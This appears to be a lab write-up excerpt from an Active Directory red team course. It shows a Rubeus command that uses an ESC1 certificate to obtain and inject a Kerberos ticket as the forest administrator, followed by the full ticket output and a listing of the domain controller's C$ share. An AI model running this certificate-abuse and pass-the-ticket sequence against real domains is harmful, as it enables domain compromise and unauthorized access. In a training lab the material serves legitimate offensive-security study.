C:\AD\Tools\openssl>..\Rubeus.exe asktgt /user:moneycorp.local\administrator /certificate:esc1.pfx /password:SecretPass@123 /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=student723, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'moneycorp.local\administrator'
[*] Using domain controller: 172.16.1.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
[+] Ticket successfully imported!
ServiceName : krbtgt/moneycorp.local
ServiceRealm : MONEYCORP.LOCAL
UserName : administrator
UserRealm : MONEYCORP.LOCAL
StartTime : 3/4/2024 8:04:02 PM
EndTime : 3/5/2024 6:04:02 AM
RenewTill : 3/11/2024 9:04:02 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : D823OEzUd0IXTF9r1lhY+w==
ASREP (key) : DF7BBA90E06746A441969FB932E61D62
C:\AD\Tools\openssl>Validamos los accesos.
C:\AD\Tools\openssl>dir \\mcorp-dc\C$
Volume in drive \\mcorp-dc\C$ has no label.
Volume Serial Number is 1A5A-FDE2
Directory of \\mcorp-dc\C$
05/08/2021 12:20 AM <DIR> PerfLogs
11/10/2022 09:53 PM <DIR> Program Files
05/08/2021 01:40 AM <DIR> Program Files (x86)
11/11/2022 06:33 AM <DIR> Users
01/10/2024 01:35 AM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 11,941,588,992 bytes free
Last updated